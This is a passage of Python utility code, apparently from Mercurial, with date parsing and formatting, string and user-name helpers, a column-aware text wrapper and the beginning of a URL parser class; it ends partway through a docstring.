1895 1895 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1896 1896 """represent a (unixtime, offset) tuple as a localized time.
1897 1897 unixtime is seconds since the epoch, and offset is the time zone's
1898 1898 number of seconds away from UTC.
1899 1899
1900 1900 >>> datestr((0, 0))
1901 1901 'Thu Jan 01 00:00:00 1970 +0000'
1902 1902 >>> datestr((42, 0))
1903 1903 'Thu Jan 01 00:00:42 1970 +0000'
1904 1904 >>> datestr((-42, 0))
1905 1905 'Wed Dec 31 23:59:18 1969 +0000'
1906 1906 >>> datestr((0x7fffffff, 0))
1907 1907 'Tue Jan 19 03:14:07 2038 +0000'
1908 1908 >>> datestr((-0x80000000, 0))
1909 1909 'Fri Dec 13 20:45:52 1901 +0000'
1910 1910 """
1911 1911 t, tz = date or makedate()
1912 1912 if "%1" in format or "%2" in format or "%z" in format:
1913 1913 sign = (tz > 0) and "-" or "+"
1914 1914 minutes = abs(tz) // 60
1915 1915 q, r = divmod(minutes, 60)
1916 1916 format = format.replace("%z", "%1%2")
1917 1917 format = format.replace("%1", "%c%02d" % (sign, q))
1918 1918 format = format.replace("%2", "%02d" % r)
1919 1919 d = t - tz
1920 1920 if d > 0x7fffffff:
1921 1921 d = 0x7fffffff
1922 1922 elif d < -0x80000000:
1923 1923 d = -0x80000000
1924 1924 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1925 1925 # because they use the gmtime() system call which is buggy on Windows
1926 1926 # for negative values.
1927 1927 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1928 1928 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1929 1929 return s
1930 1930
1931 1931 def shortdate(date=None):
1932 1932 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1933 1933 return datestr(date, format='%Y-%m-%d')
1934 1934
1935 1935 def parsetimezone(s):
1936 1936 """find a trailing timezone, if any, in string, and return a
1937 1937 (offset, remainder) pair"""
1938 1938
1939 1939 if s.endswith("GMT") or s.endswith("UTC"):
1940 1940 return 0, s[:-3].rstrip()
1941 1941
1942 1942 # Unix-style timezones [+-]hhmm
1943 1943 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1944 1944 sign = (s[-5] == "+") and 1 or -1
1945 1945 hours = int(s[-4:-2])
1946 1946 minutes = int(s[-2:])
1947 1947 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1948 1948
1949 1949 # ISO8601 trailing Z
1950 1950 if s.endswith("Z") and s[-2:-1].isdigit():
1951 1951 return 0, s[:-1]
1952 1952
1953 1953 # ISO8601-style [+-]hh:mm
1954 1954 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1955 1955 s[-5:-3].isdigit() and s[-2:].isdigit()):
1956 1956 sign = (s[-6] == "+") and 1 or -1
1957 1957 hours = int(s[-5:-3])
1958 1958 minutes = int(s[-2:])
1959 1959 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1960 1960
1961 1961 return None, s
1962 1962
1963 1963 def strdate(string, format, defaults=None):
1964 1964 """parse a localized time string and return a (unixtime, offset) tuple.
1965 1965 if the string cannot be parsed, ValueError is raised."""
1966 1966 if defaults is None:
1967 1967 defaults = {}
1968 1968
1969 1969 # NOTE: unixtime = localunixtime + offset
1970 1970 offset, date = parsetimezone(string)
1971 1971
1972 1972 # add missing elements from defaults
1973 1973 usenow = False # default to using biased defaults
1974 1974 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1975 1975 part = pycompat.bytestr(part)
1976 1976 found = [True for p in part if ("%"+p) in format]
1977 1977 if not found:
1978 1978 date += "@" + defaults[part][usenow]
1979 1979 format += "@%" + part[0]
1980 1980 else:
1981 1981 # We've found a specific time element, less specific time
1982 1982 # elements are relative to today
1983 1983 usenow = True
1984 1984
1985 1985 timetuple = time.strptime(encoding.strfromlocal(date),
1986 1986 encoding.strfromlocal(format))
1987 1987 localunixtime = int(calendar.timegm(timetuple))
1988 1988 if offset is None:
1989 1989 # local timezone
1990 1990 unixtime = int(time.mktime(timetuple))
1991 1991 offset = unixtime - localunixtime
1992 1992 else:
1993 1993 unixtime = localunixtime + offset
1994 1994 return unixtime, offset
1995 1995
1996 1996 def parsedate(date, formats=None, bias=None):
1997 1997 """parse a localized date/time and return a (unixtime, offset) tuple.
1998 1998
1999 1999 The date may be a "unixtime offset" string or in one of the specified
2000 2000 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2001 2001
2002 2002 >>> parsedate(' today ') == parsedate(\
2003 2003 datetime.date.today().strftime('%b %d'))
2004 2004 True
2005 2005 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2006 2006 datetime.timedelta(days=1)\
2007 2007 ).strftime('%b %d'))
2008 2008 True
2009 2009 >>> now, tz = makedate()
2010 2010 >>> strnow, strtz = parsedate('now')
2011 2011 >>> (strnow - now) < 1
2012 2012 True
2013 2013 >>> tz == strtz
2014 2014 True
2015 2015 """
2016 2016 if bias is None:
2017 2017 bias = {}
2018 2018 if not date:
2019 2019 return 0, 0
2020 2020 if isinstance(date, tuple) and len(date) == 2:
2021 2021 return date
2022 2022 if not formats:
2023 2023 formats = defaultdateformats
2024 2024 date = date.strip()
2025 2025
2026 2026 if date == 'now' or date == _('now'):
2027 2027 return makedate()
2028 2028 if date == 'today' or date == _('today'):
2029 2029 date = datetime.date.today().strftime('%b %d')
2030 2030 elif date == 'yesterday' or date == _('yesterday'):
2031 2031 date = (datetime.date.today() -
2032 2032 datetime.timedelta(days=1)).strftime('%b %d')
2033 2033
2034 2034 try:
2035 2035 when, offset = map(int, date.split(' '))
2036 2036 except ValueError:
2037 2037 # fill out defaults
2038 2038 now = makedate()
2039 2039 defaults = {}
2040 2040 for part in ("d", "mb", "yY", "HI", "M", "S"):
2041 2041 # this piece is for rounding the specific end of unknowns
2042 2042 b = bias.get(part)
2043 2043 if b is None:
2044 2044 if part[0:1] in "HMS":
2045 2045 b = "00"
2046 2046 else:
2047 2047 b = "0"
2048 2048
2049 2049 # this piece is for matching the generic end to today's date
2050 2050 n = datestr(now, "%" + part[0:1])
2051 2051
2052 2052 defaults[part] = (b, n)
2053 2053
2054 2054 for format in formats:
2055 2055 try:
2056 2056 when, offset = strdate(date, format, defaults)
2057 2057 except (ValueError, OverflowError):
2058 2058 pass
2059 2059 else:
2060 2060 break
2061 2061 else:
2062 2062 raise error.ParseError(_('invalid date: %r') % date)
2063 2063 # validate explicit (probably user-specified) date and
2064 2064 # time zone offset. values must fit in signed 32 bits for
2065 2065 # current 32-bit linux runtimes. timezones go from UTC-12
2066 2066 # to UTC+14
2067 2067 if when < -0x80000000 or when > 0x7fffffff:
2068 2068 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2069 2069 if offset < -50400 or offset > 43200:
2070 2070 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2071 2071 return when, offset
2072 2072
2073 2073 def matchdate(date):
2074 2074 """Return a function that matches a given date match specifier
2075 2075
2076 2076 Formats include:
2077 2077
2078 2078 '{date}' match a given date to the accuracy provided
2079 2079
2080 2080 '<{date}' on or before a given date
2081 2081
2082 2082 '>{date}' on or after a given date
2083 2083
2084 2084 >>> p1 = parsedate("10:29:59")
2085 2085 >>> p2 = parsedate("10:30:00")
2086 2086 >>> p3 = parsedate("10:30:59")
2087 2087 >>> p4 = parsedate("10:31:00")
2088 2088 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2089 2089 >>> f = matchdate("10:30")
2090 2090 >>> f(p1[0])
2091 2091 False
2092 2092 >>> f(p2[0])
2093 2093 True
2094 2094 >>> f(p3[0])
2095 2095 True
2096 2096 >>> f(p4[0])
2097 2097 False
2098 2098 >>> f(p5[0])
2099 2099 False
2100 2100 """
2101 2101
2102 2102 def lower(date):
2103 2103 d = {'mb': "1", 'd': "1"}
2104 2104 return parsedate(date, extendeddateformats, d)[0]
2105 2105
2106 2106 def upper(date):
2107 2107 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2108 2108 for days in ("31", "30", "29"):
2109 2109 try:
2110 2110 d["d"] = days
2111 2111 return parsedate(date, extendeddateformats, d)[0]
2112 2112 except Abort:
2113 2113 pass
2114 2114 d["d"] = "28"
2115 2115 return parsedate(date, extendeddateformats, d)[0]
2116 2116
2117 2117 date = date.strip()
2118 2118
2119 2119 if not date:
2120 2120 raise Abort(_("dates cannot consist entirely of whitespace"))
2121 2121 elif date[0] == "<":
2122 2122 if not date[1:]:
2123 2123 raise Abort(_("invalid day spec, use '<DATE'"))
2124 2124 when = upper(date[1:])
2125 2125 return lambda x: x <= when
2126 2126 elif date[0] == ">":
2127 2127 if not date[1:]:
2128 2128 raise Abort(_("invalid day spec, use '>DATE'"))
2129 2129 when = lower(date[1:])
2130 2130 return lambda x: x >= when
2131 2131 elif date[0] == "-":
2132 2132 try:
2133 2133 days = int(date[1:])
2134 2134 except ValueError:
2135 2135 raise Abort(_("invalid day spec: %s") % date[1:])
2136 2136 if days < 0:
2137 2137 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2138 2138 % date[1:])
2139 2139 when = makedate()[0] - days * 3600 * 24
2140 2140 return lambda x: x >= when
2141 2141 elif " to " in date:
2142 2142 a, b = date.split(" to ")
2143 2143 start, stop = lower(a), upper(b)
2144 2144 return lambda x: x >= start and x <= stop
2145 2145 else:
2146 2146 start, stop = lower(date), upper(date)
2147 2147 return lambda x: x >= start and x <= stop
2148 2148
2149 2149 def stringmatcher(pattern, casesensitive=True):
2150 2150 """
2151 2151 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2152 2152 returns the matcher name, pattern, and matcher function.
2153 2153 missing or unknown prefixes are treated as literal matches.
2154 2154
2155 2155 helper for tests:
2156 2156 >>> def test(pattern, *tests):
2157 2157 ... kind, pattern, matcher = stringmatcher(pattern)
2158 2158 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2159 2159 >>> def itest(pattern, *tests):
2160 2160 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2161 2161 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2162 2162
2163 2163 exact matching (no prefix):
2164 2164 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2165 2165 ('literal', 'abcdefg', [False, False, True])
2166 2166
2167 2167 regex matching ('re:' prefix)
2168 2168 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2169 2169 ('re', 'a.+b', [False, False, True])
2170 2170
2171 2171 force exact matches ('literal:' prefix)
2172 2172 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2173 2173 ('literal', 're:foobar', [False, True])
2174 2174
2175 2175 unknown prefixes are ignored and treated as literals
2176 2176 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2177 2177 ('literal', 'foo:bar', [False, False, True])
2178 2178
2179 2179 case insensitive regex matches
2180 2180 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2181 2181 ('re', 'A.+b', [False, False, True])
2182 2182
2183 2183 case insensitive literal matches
2184 2184 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2185 2185 ('literal', 'ABCDEFG', [False, False, True])
2186 2186 """
2187 2187 if pattern.startswith('re:'):
2188 2188 pattern = pattern[3:]
2189 2189 try:
2190 2190 flags = 0
2191 2191 if not casesensitive:
2192 2192 flags = remod.I
2193 2193 regex = remod.compile(pattern, flags)
2194 2194 except remod.error as e:
2195 2195 raise error.ParseError(_('invalid regular expression: %s')
2196 2196 % e)
2197 2197 return 're', pattern, regex.search
2198 2198 elif pattern.startswith('literal:'):
2199 2199 pattern = pattern[8:]
2200 2200
2201 2201 match = pattern.__eq__
2202 2202
2203 2203 if not casesensitive:
2204 2204 ipat = encoding.lower(pattern)
2205 2205 match = lambda s: ipat == encoding.lower(s)
2206 2206 return 'literal', pattern, match
2207 2207
2208 2208 def shortuser(user):
2209 2209 """Return a short representation of a user name or email address."""
2210 2210 f = user.find('@')
2211 2211 if f >= 0:
2212 2212 user = user[:f]
2213 2213 f = user.find('<')
2214 2214 if f >= 0:
2215 2215 user = user[f + 1:]
2216 2216 f = user.find(' ')
2217 2217 if f >= 0:
2218 2218 user = user[:f]
2219 2219 f = user.find('.')
2220 2220 if f >= 0:
2221 2221 user = user[:f]
2222 2222 return user
2223 2223
2224 2224 def emailuser(user):
2225 2225 """Return the user portion of an email address."""
2226 2226 f = user.find('@')
2227 2227 if f >= 0:
2228 2228 user = user[:f]
2229 2229 f = user.find('<')
2230 2230 if f >= 0:
2231 2231 user = user[f + 1:]
2232 2232 return user
2233 2233
2234 2234 def email(author):
2235 2235 '''get email of author.'''
2236 2236 r = author.find('>')
2237 2237 if r == -1:
2238 2238 r = None
2239 2239 return author[author.find('<') + 1:r]
2240 2240
2241 2241 def ellipsis(text, maxlength=400):
2242 2242 """Trim string to at most maxlength (default: 400) columns in display."""
2243 2243 return encoding.trim(text, maxlength, ellipsis='...')
2244 2244
2245 2245 def unitcountfn(*unittable):
2246 2246 '''return a function that renders a readable count of some quantity'''
2247 2247
2248 2248 def go(count):
2249 2249 for multiplier, divisor, format in unittable:
2250 2250 if abs(count) >= divisor * multiplier:
2251 2251 return format % (count / float(divisor))
2252 2252 return unittable[-1][2] % count
2253 2253
2254 2254 return go
2255 2255
2256 2256 def processlinerange(fromline, toline):
2257 2257 """Check that linerange <fromline>:<toline> makes sense and return a
2258 2258 0-based range.
2259 2259
2260 2260 >>> processlinerange(10, 20)
2261 2261 (9, 20)
2262 2262 >>> processlinerange(2, 1)
2263 2263 Traceback (most recent call last):
2264 2264 ...
2265 2265 ParseError: line range must be positive
2266 2266 >>> processlinerange(0, 5)
2267 2267 Traceback (most recent call last):
2268 2268 ...
2269 2269 ParseError: fromline must be strictly positive
2270 2270 """
2271 2271 if toline - fromline < 0:
2272 2272 raise error.ParseError(_("line range must be positive"))
2273 2273 if fromline < 1:
2274 2274 raise error.ParseError(_("fromline must be strictly positive"))
2275 2275 return fromline - 1, toline
2276 2276
2277 2277 bytecount = unitcountfn(
2278 2278 (100, 1 << 30, _('%.0f GB')),
2279 2279 (10, 1 << 30, _('%.1f GB')),
2280 2280 (1, 1 << 30, _('%.2f GB')),
2281 2281 (100, 1 << 20, _('%.0f MB')),
2282 2282 (10, 1 << 20, _('%.1f MB')),
2283 2283 (1, 1 << 20, _('%.2f MB')),
2284 2284 (100, 1 << 10, _('%.0f KB')),
2285 2285 (10, 1 << 10, _('%.1f KB')),
2286 2286 (1, 1 << 10, _('%.2f KB')),
2287 2287 (1, 1, _('%.0f bytes')),
2288 2288 )
2289 2289
2290 2290 # Matches a single EOL which can either be a CRLF where repeated CR
2291 2291 # are removed or a LF. We do not care about old Macintosh files, so a
2292 2292 # stray CR is an error.
2293 2293 _eolre = remod.compile(br'\r*\n')
2294 2294
2295 2295 def tolf(s):
2296 2296 return _eolre.sub('\n', s)
2297 2297
2298 2298 def tocrlf(s):
2299 2299 return _eolre.sub('\r\n', s)
2300 2300
2301 2301 if pycompat.oslinesep == '\r\n':
2302 2302 tonativeeol = tocrlf
2303 2303 fromnativeeol = tolf
2304 2304 else:
2305 2305 tonativeeol = pycompat.identity
2306 2306 fromnativeeol = pycompat.identity
2307 2307
2308 2308 def escapestr(s):
2309 2309 # call underlying function of s.encode('string_escape') directly for
2310 2310 # Python 3 compatibility
2311 2311 return codecs.escape_encode(s)[0]
2312 2312
2313 2313 def unescapestr(s):
2314 2314 return codecs.escape_decode(s)[0]
2315 2315
2316 2316 def forcebytestr(obj):
2317 2317 """Portably format an arbitrary object (e.g. exception) into a byte
2318 2318 string."""
2319 2319 try:
2320 2320 return pycompat.bytestr(obj)
2321 2321 except UnicodeEncodeError:
2322 2322 # non-ascii string, may be lossy
2323 2323 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2324 2324
2325 2325 def uirepr(s):
2326 2326 # Avoid double backslash in Windows path repr()
2327 2327 return repr(s).replace('\\\\', '\\')
2328 2328
2329 2329 # delay import of textwrap
2330 2330 def MBTextWrapper(**kwargs):
2331 2331 class tw(textwrap.TextWrapper):
2332 2332 """
2333 2333 Extend TextWrapper for width-awareness.
2334 2334
2335 2335 Neither number of 'bytes' in any encoding nor 'characters' is
2336 2336 appropriate to calculate terminal columns for specified string.
2337 2337
2338 2338 Original TextWrapper implementation uses built-in 'len()' directly,
2339 2339 so overriding is needed to use width information of each characters.
2340 2340
2341 2341 In addition, characters classified into 'ambiguous' width are
2342 2342 treated as wide in East Asian area, but as narrow in other.
2343 2343
2344 2344 This requires use decision to determine width of such characters.
2345 2345 """
2346 2346 def _cutdown(self, ucstr, space_left):
2347 2347 l = 0
2348 2348 colwidth = encoding.ucolwidth
2349 2349 for i in xrange(len(ucstr)):
2350 2350 l += colwidth(ucstr[i])
2351 2351 if space_left < l:
2352 2352 return (ucstr[:i], ucstr[i:])
2353 2353 return ucstr, ''
2354 2354
2355 2355 # overriding of base class
2356 2356 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2357 2357 space_left = max(width - cur_len, 1)
2358 2358
2359 2359 if self.break_long_words:
2360 2360 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2361 2361 cur_line.append(cut)
2362 2362 reversed_chunks[-1] = res
2363 2363 elif not cur_line:
2364 2364 cur_line.append(reversed_chunks.pop())
2365 2365
2366 2366 # this overriding code is imported from TextWrapper of Python 2.6
2367 2367 # to calculate columns of string by 'encoding.ucolwidth()'
2368 2368 def _wrap_chunks(self, chunks):
2369 2369 colwidth = encoding.ucolwidth
2370 2370
2371 2371 lines = []
2372 2372 if self.width <= 0:
2373 2373 raise ValueError("invalid width %r (must be > 0)" % self.width)
2374 2374
2375 2375 # Arrange in reverse order so items can be efficiently popped
2376 2376 # from a stack of chucks.
2377 2377 chunks.reverse()
2378 2378
2379 2379 while chunks:
2380 2380
2381 2381 # Start the list of chunks that will make up the current line.
2382 2382 # cur_len is just the length of all the chunks in cur_line.
2383 2383 cur_line = []
2384 2384 cur_len = 0
2385 2385
2386 2386 # Figure out which static string will prefix this line.
2387 2387 if lines:
2388 2388 indent = self.subsequent_indent
2389 2389 else:
2390 2390 indent = self.initial_indent
2391 2391
2392 2392 # Maximum width for this line.
2393 2393 width = self.width - len(indent)
2394 2394
2395 2395 # First chunk on line is whitespace -- drop it, unless this
2396 2396 # is the very beginning of the text (i.e. no lines started yet).
2397 2397 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2398 2398 del chunks[-1]
2399 2399
2400 2400 while chunks:
2401 2401 l = colwidth(chunks[-1])
2402 2402
2403 2403 # Can at least squeeze this chunk onto the current line.
2404 2404 if cur_len + l <= width:
2405 2405 cur_line.append(chunks.pop())
2406 2406 cur_len += l
2407 2407
2408 2408 # Nope, this line is full.
2409 2409 else:
2410 2410 break
2411 2411
2412 2412 # The current line is full, and the next chunk is too big to
2413 2413 # fit on *any* line (not just this one).
2414 2414 if chunks and colwidth(chunks[-1]) > width:
2415 2415 self._handle_long_word(chunks, cur_line, cur_len, width)
2416 2416
2417 2417 # If the last chunk on this line is all whitespace, drop it.
2418 2418 if (self.drop_whitespace and
2419 2419 cur_line and cur_line[-1].strip() == r''):
2420 2420 del cur_line[-1]
2421 2421
2422 2422 # Convert current line back to a string and store it in list
2423 2423 # of all lines (return value).
2424 2424 if cur_line:
2425 2425 lines.append(indent + r''.join(cur_line))
2426 2426
2427 2427 return lines
2428 2428
2429 2429 global MBTextWrapper
2430 2430 MBTextWrapper = tw
2431 2431 return tw(**kwargs)
2432 2432
2433 2433 def wrap(line, width, initindent='', hangindent=''):
2434 2434 maxindent = max(len(hangindent), len(initindent))
2435 2435 if width <= maxindent:
2436 2436 # adjust for weird terminal size
2437 2437 width = max(78, maxindent + 1)
2438 2438 line = line.decode(pycompat.sysstr(encoding.encoding),
2439 2439 pycompat.sysstr(encoding.encodingmode))
2440 2440 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2441 2441 pycompat.sysstr(encoding.encodingmode))
2442 2442 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2443 2443 pycompat.sysstr(encoding.encodingmode))
2444 2444 wrapper = MBTextWrapper(width=width,
2445 2445 initial_indent=initindent,
2446 2446 subsequent_indent=hangindent)
2447 2447 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2448 2448
2449 2449 if (pyplatform.python_implementation() == 'CPython' and
2450 2450 sys.version_info < (3, 0)):
2451 2451 # There is an issue in CPython that some IO methods do not handle EINTR
2452 2452 # correctly. The following table shows what CPython version (and functions)
2453 2453 # are affected (buggy: has the EINTR bug, okay: otherwise):
2454 2454 #
2455 2455 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2456 2456 # --------------------------------------------------
2457 2457 # fp.__iter__ | buggy | buggy | okay
2458 2458 # fp.read* | buggy | okay [1] | okay
2459 2459 #
2460 2460 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2461 2461 #
2462 2462 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2463 2463 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2464 2464 #
2465 2465 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2466 2466 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2467 2467 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2468 2468 # fp.__iter__ but not other fp.read* methods.
2469 2469 #
2470 2470 # On modern systems like Linux, the "read" syscall cannot be interrupted
2471 2471 # when reading "fast" files like on-disk files. So the EINTR issue only
2472 2472 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2473 2473 # files approximately as "fast" files and use the fast (unsafe) code path,
2474 2474 # to minimize the performance impact.
2475 2475 if sys.version_info >= (2, 7, 4):
2476 2476 # fp.readline deals with EINTR correctly, use it as a workaround.
2477 2477 def _safeiterfile(fp):
2478 2478 return iter(fp.readline, '')
2479 2479 else:
2480 2480 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2481 2481 # note: this may block longer than necessary because of bufsize.
2482 2482 def _safeiterfile(fp, bufsize=4096):
2483 2483 fd = fp.fileno()
2484 2484 line = ''
2485 2485 while True:
2486 2486 try:
2487 2487 buf = os.read(fd, bufsize)
2488 2488 except OSError as ex:
2489 2489 # os.read only raises EINTR before any data is read
2490 2490 if ex.errno == errno.EINTR:
2491 2491 continue
2492 2492 else:
2493 2493 raise
2494 2494 line += buf
2495 2495 if '\n' in buf:
2496 2496 splitted = line.splitlines(True)
2497 2497 line = ''
2498 2498 for l in splitted:
2499 2499 if l[-1] == '\n':
2500 2500 yield l
2501 2501 else:
2502 2502 line = l
2503 2503 if not buf:
2504 2504 break
2505 2505 if line:
2506 2506 yield line
2507 2507
2508 2508 def iterfile(fp):
2509 2509 fastpath = True
2510 2510 if type(fp) is file:
2511 2511 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2512 2512 if fastpath:
2513 2513 return fp
2514 2514 else:
2515 2515 return _safeiterfile(fp)
2516 2516 else:
2517 2517 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2518 2518 def iterfile(fp):
2519 2519 return fp
2520 2520
2521 2521 def iterlines(iterator):
2522 2522 for chunk in iterator:
2523 2523 for line in chunk.splitlines():
2524 2524 yield line
2525 2525
2526 2526 def expandpath(path):
2527 2527 return os.path.expanduser(os.path.expandvars(path))
2528 2528
2529 2529 def hgcmd():
2530 2530 """Return the command used to execute current hg
2531 2531
2532 2532 This is different from hgexecutable() because on Windows we want
2533 2533 to avoid things opening new shell windows like batch files, so we
2534 2534 get either the python call or current executable.
2535 2535 """
2536 2536 if mainfrozen():
2537 2537 if getattr(sys, 'frozen', None) == 'macosx_app':
2538 2538 # Env variable set by py2app
2539 2539 return [encoding.environ['EXECUTABLEPATH']]
2540 2540 else:
2541 2541 return [pycompat.sysexecutable]
2542 2542 return gethgcmd()
2543 2543
2544 2544 def rundetached(args, condfn):
2545 2545 """Execute the argument list in a detached process.
2546 2546
2547 2547 condfn is a callable which is called repeatedly and should return
2548 2548 True once the child process is known to have started successfully.
2549 2549 At this point, the child process PID is returned. If the child
2550 2550 process fails to start or finishes before condfn() evaluates to
2551 2551 True, return -1.
2552 2552 """
2553 2553 # Windows case is easier because the child process is either
2554 2554 # successfully starting and validating the condition or exiting
2555 2555 # on failure. We just poll on its PID. On Unix, if the child
2556 2556 # process fails to start, it will be left in a zombie state until
2557 2557 # the parent wait on it, which we cannot do since we expect a long
2558 2558 # running process on success. Instead we listen for SIGCHLD telling
2559 2559 # us our child process terminated.
2560 2560 terminated = set()
2561 2561 def handler(signum, frame):
2562 2562 terminated.add(os.wait())
2563 2563 prevhandler = None
2564 2564 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2565 2565 if SIGCHLD is not None:
2566 2566 prevhandler = signal.signal(SIGCHLD, handler)
2567 2567 try:
2568 2568 pid = spawndetached(args)
2569 2569 while not condfn():
2570 2570 if ((pid in terminated or not testpid(pid))
2571 2571 and not condfn()):
2572 2572 return -1
2573 2573 time.sleep(0.1)
2574 2574 return pid
2575 2575 finally:
2576 2576 if prevhandler is not None:
2577 2577 signal.signal(signal.SIGCHLD, prevhandler)
2578 2578
2579 2579 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2580 2580 """Return the result of interpolating items in the mapping into string s.
2581 2581
2582 2582 prefix is a single character string, or a two character string with
2583 2583 a backslash as the first character if the prefix needs to be escaped in
2584 2584 a regular expression.
2585 2585
2586 2586 fn is an optional function that will be applied to the replacement text
2587 2587 just before replacement.
2588 2588
2589 2589 escape_prefix is an optional flag that allows using doubled prefix for
2590 2590 its escaping.
2591 2591 """
2592 2592 fn = fn or (lambda s: s)
2593 2593 patterns = '|'.join(mapping.keys())
2594 2594 if escape_prefix:
2595 2595 patterns += '|' + prefix
2596 2596 if len(prefix) > 1:
2597 2597 prefix_char = prefix[1:]
2598 2598 else:
2599 2599 prefix_char = prefix
2600 2600 mapping[prefix_char] = prefix_char
2601 2601 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2602 2602 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2603 2603
2604 2604 def getport(port):
2605 2605 """Return the port for a given network service.
2606 2606
2607 2607 If port is an integer, it's returned as is. If it's a string, it's
2608 2608 looked up using socket.getservbyname(). If there's no matching
2609 2609 service, error.Abort is raised.
2610 2610 """
2611 2611 try:
2612 2612 return int(port)
2613 2613 except ValueError:
2614 2614 pass
2615 2615
2616 2616 try:
2617 2617 return socket.getservbyname(port)
2618 2618 except socket.error:
2619 2619 raise Abort(_("no port number associated with service '%s'") % port)
2620 2620
2621 2621 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2622 2622 '0': False, 'no': False, 'false': False, 'off': False,
2623 2623 'never': False}
2624 2624
2625 2625 def parsebool(s):
2626 2626 """Parse s into a boolean.
2627 2627
2628 2628 If s is not a valid boolean, returns None.
2629 2629 """
2630 2630 return _booleans.get(s.lower(), None)
2631 2631
2632 2632 _hextochr = dict((a + b, chr(int(a + b, 16)))
2633 2633 for a in string.hexdigits for b in string.hexdigits)
2634 2634
2635 2635 class url(object):
2636 2636 r"""Reliable URL parser.
2637 2637
2638 2638 This parses URLs and provides attributes for the following
2639 2639 components:
2640 2640
2641 2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2642 2642
2643 2643 Missing components are set to None. The only exception is
2644 2644 fragment, which is set to '' if present but empty.
2645 2645
2646 2646 If parsefragment is False, fragment is included in query. If
2647 2647 parsequery is False, query is included in path. If both are
2648 2648 False, both fragment and query are included in path.
2649 2649
2650 2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2651 2651
2652 2652 Note that for backward compatibility reasons, bundle URLs do not
2653 2653 take host names. That means 'bundle://../' has a path of '../'.
2654 2654
2655 2655 Examples:
2656 2656
2657 2657 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2658 2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2659 2659 >>> url('ssh://[::1]:2200//home/joe/repo')
2660 2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2661 2661 >>> url('file:///home/joe/repo')
2662 2662 <url scheme: 'file', path: '/home/joe/repo'>
2663 2663 >>> url('file:///c:/temp/foo/')
2664 2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2665 2665 >>> url('bundle:foo')
2666 2666 <url scheme: 'bundle', path: 'foo'>
2667 2667 >>> url('bundle://../foo')
2668 2668 <url scheme: 'bundle', path: '../foo'>
2669 2669 >>> url(r'c:\foo\bar')
2670 2670 <url path: 'c:\\foo\\bar'>
2671 2671 >>> url(r'\\blah\blah\blah')
2672 2672 <url path: '\\\\blah\\blah\\blah'>
2673 2673 >>> url(r'\\blah\blah\blah#baz')
2674 2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2675 2675 >>> url(r'file:///C:\users\me')
2676 2676 <url scheme: 'file', path: 'C:\\users\\me'>
2677 2677
2678 2678 Authentication credentials:
2679 2679
2680 2680 >>> url('ssh://joe:xyz@x/repo')
2681 2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2682 2682 >>> url('ssh://joe@x/repo')
2683 2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2684 2684
2685 2685 Query strings and fragments:
2686 2686
2687 2687 >>> url('http://host/a?b#c')
2688 2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2689 2689 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2690 2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2691 2691
2692 2692 Empty path:
2693 2693
2694 2694 >>> url('')
